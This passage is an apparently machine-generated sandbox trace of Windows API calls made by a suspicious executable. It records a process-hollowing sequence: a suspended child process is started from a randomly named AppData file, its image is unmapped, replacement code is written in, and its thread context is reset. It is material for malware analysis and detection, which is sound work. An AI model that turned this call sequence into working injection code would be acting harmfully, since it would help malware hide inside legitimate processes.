(in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.833] VirtualProtect (in: lpAddress=0x1735b8, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0097.834] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0097.834] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0097.834] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0097.834] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0097.834] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0097.834] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0097.835] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0097.835] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0097.835] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0097.835] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0097.835] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0097.835] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0097.835] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0097.835] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0097.930] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0xb013c [0099.152] PostMessageA (hWnd=0xb013c, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0099.152] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0099.152] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0099.152] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x150000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe")) returned 0x36 [0099.152] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.152] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xc14, dwThreadId=0xc18)) returned 1 [0099.155] VirtualFree (lpAddress=0x150000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.155] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0099.156] GetThreadContext (in: hThread=0x48, lpContext=0x150000 | out: lpContext=0x150000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd7000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0099.272] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd7008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0099.272] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0099.272] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0099.273] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x174858*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x174858*, lpNumberOfBytesWritten=0x0) returned 1 [0099.273] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x174c58, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0099.273] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x174c58*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x174c58*, lpNumberOfBytesWritten=0x0) returned 1 [0099.285] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x1c9258*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1c9258*, lpNumberOfBytesWritten=0x0) returned 1 [0099.286] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd7008, lpBuffer=0x17498c*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x17498c*, lpNumberOfBytesWritten=0x0) returned 1 [0099.286] SetThreadContext (hThread=0x48, lpContext=0x150000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd7000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, 